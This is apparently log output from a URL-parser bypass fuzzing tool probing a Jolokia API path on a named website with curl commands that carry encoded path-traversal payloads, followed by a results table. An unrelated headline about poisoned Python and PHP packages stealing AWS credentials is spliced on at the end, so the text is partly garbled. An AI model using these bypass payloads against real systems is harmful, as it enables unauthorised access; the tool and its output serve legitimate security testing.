2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b%2f%2e%2e%2f%2e%2e%2f%2f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3f%23//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl - sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3f%3f//list'
2022-05-10 15:54:09 work bup[738125] WARNING Stage: save_and_quit
2022-05-10 15:54:10 work bup[738125] INFO Saving html pages and short output in: /tmp/tmp48drf_ie-bypass-url-parser
2022-05-10 15:54:10 work bup[738125] INFO Triaged results shows the following distinct pages:
9: 41 - 850a2bd214c68f582aaac1c84c702b5d.html
10: 97 - 219145da181c48fea603aab3097d8201.html
10: 99 - 309b8397d07f618ec07541c418979a84.html
10: 100 - 9a1304f66bfee2130b34258635d50171.html
10: 108 - b61052875693afa4b86d39321d4170b4.html
10: 109 - 6fb5c59f5c29d23e407d6f041523a2bb.html
11: 101 - 045d36e3cfba7f6cbb7e657fc6cf1125.html
12:43116 - 9787a734c56b37f7bf5d78aaee43c55d.html
1 6: 41 - c5663aedf1036c950a5d83bd83c8e4e7.html
21: 156 - 7857d3d4a9bc8bf69278bf43c4918909.html
22: 107 - 011ca570bdf2e5babcf4f99c4cd84126.html
22: 109 - 6d4b61258386f744a388d402a5f11d03.html
22: 110 - 2f26cd3ba49e023dbda4453e5fd89431.html
76: 821 - bfe5f92861f949e44b355ee22574194a.html
2022-05-10 15:54:10 work bup[738125] INFO Also, inspect them manually with batcat:
echo /tmp/tmp48drf_ie-bypass-url-parser/{850a2bd214c68f582aaac1c84c702b5d.html,219145da181c48fea603aab3097d8201.html,309b8397d07f618ec07541c418979a84.html,9a1304f66bfee2130b34258635d50171.html,b61052875693afa4b86d39321d4170b4.html,6fb5c59f5c29d23e407d6f041523a2bb.html,045d36e3cfba7f6cbb7e657fc6cf1125.html,9787a734c56b37f7bf5d78aaee43c55d.html,c5663aedf1036c950a5d83bd83c8e4e7.html,7857d3d4a9bc8bf69278bf43c4918909.html,011ca570bdf2e5babcf4f99c4cd84126.html,6d4b61258386f744a388d402a5f11d03.html,2f26cd3ba49e023dbda4453e5fd89431.html,bfe5f92861f949e44b355ee22574194a.html} | xa rgs bat


Poisoned Python and PHP packages purloin passwords for AWS access

More supply chain trouble - this time with clear examples so you can learn how to spot this stuff yourself.

❌